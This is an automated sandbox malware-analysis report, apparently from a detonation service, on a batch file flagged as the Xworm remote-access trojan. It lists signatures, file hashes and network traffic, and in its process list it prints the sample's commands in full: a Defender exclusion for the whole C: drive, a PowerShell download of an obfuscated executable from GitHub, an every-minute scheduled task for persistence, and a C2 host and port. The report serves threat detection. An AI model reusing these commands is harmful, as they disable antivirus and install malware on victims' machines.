Analysis Overview
SHA256
9123d299aaf0d551dc6a10b83ae8143586c68279af85fab5e2291993c550179c
Threat Level: Known bad
The file SexyBoy.bat was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 18:48
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 18:48
Reported
2024-05-26 18:49
Platform
win10-20240404-en
Max time kernel
31s
Max time network
40s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Security.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\Security = "C:\\Users\\Admin\\AppData\\Roaming\\Security.exe" | C:\Users\Admin\AppData\Local\Temp\Security.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SexyBoy.bat"
C:\Windows\system32\net.exe
NET FILE
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 FILE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Add-MpPreference -ExclusionPath 'C:\'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/Proxyonly/wewewewe/raw/main/S"e"cur"i"ty.exe', 'C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe')"
C:\Users\Admin\AppData\Local\Temp\Security.exe
"C:\Users\Admin\AppData\Local\Temp\Se"c"urity.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Security" /tr "C:\Users\Admin\AppData\Roaming\Security.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | paris-disciplinary.gl.at.ply.gg | udp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
| US | 147.185.221.19:63286 | paris-disciplinary.gl.at.ply.gg | tcp |
Files
memory/4116-0-0x00007FF8E5173000-0x00007FF8E5174000-memory.dmp
memory/4116-5-0x000001D8B1100000-0x000001D8B1122000-memory.dmp
memory/4116-7-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4116-9-0x000001D8B12B0000-0x000001D8B1326000-memory.dmp
memory/4116-10-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o05aqsrn.chy.ps1
| Hash | Value |
| --- | --- |
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4116-23-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4116-49-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4116-50-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| Hash | Value |
| --- | --- |
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
memory/4980-57-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 7b1f83ac48cbe6055096e17c831c8241 |
| SHA1 | 29bbd8eceafbf7dfaab51aeb06e62f8e79385180 |
| SHA256 | 69ae18fb29c7d6d3c7b0ac41c707509410b693d0174bb929bbe53e167e62cc77 |
| SHA512 | 84f40c1f902a9f5fa2dbbf0e612a4f452a4f3772dca5b2d98bbe09569ccbf41de6c7b06e93736f73d0b7fcaf4997b41417682a45c3b51b86d8433fb70a25ebf6 |
memory/4980-60-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4980-69-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
memory/4980-79-0x00007FF8E5170000-0x00007FF8E5B5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Security.exe
| Hash | Value |
| --- | --- |
| MD5 | 8cfcf2a8ff7ed19f56c4ba6ad32ff237 |
| SHA1 | 3bfa32a1a8f738a8390fb029c098d6db43f000ee |
| SHA256 | 55de204273cd069d114a5928de0af46b93bde9b437bd01ae10c443d48aba1276 |
| SHA512 | 46b4933efeff1075c1b629c1c00f077c9a5ffc0ba0cdd01ad393be31064c65e75982988153fe0a393c3519c3a922292efc369826e32bac9aa96a0cce7de2d2cb |
memory/3144-83-0x0000000000EC0000-0x0000000000ED6000-memory.dmp